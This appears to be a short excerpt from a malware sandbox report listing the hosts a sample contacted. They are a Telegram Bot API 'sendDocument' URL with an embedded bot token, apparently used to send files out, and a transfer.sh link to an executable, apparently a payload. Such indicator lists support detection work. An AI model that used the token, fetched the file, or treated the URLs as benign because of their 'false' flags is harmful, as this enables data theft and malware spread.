62041 TELEGRAMRU false

Contacted Domains

Name IP Active
transfer.sh 144.76.136.153 true
api.telegram.org 149.154.167.220 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument false
    		high
    https://transfer.sh/Uv5XFY/0000.LPCD2022.exe false
      		high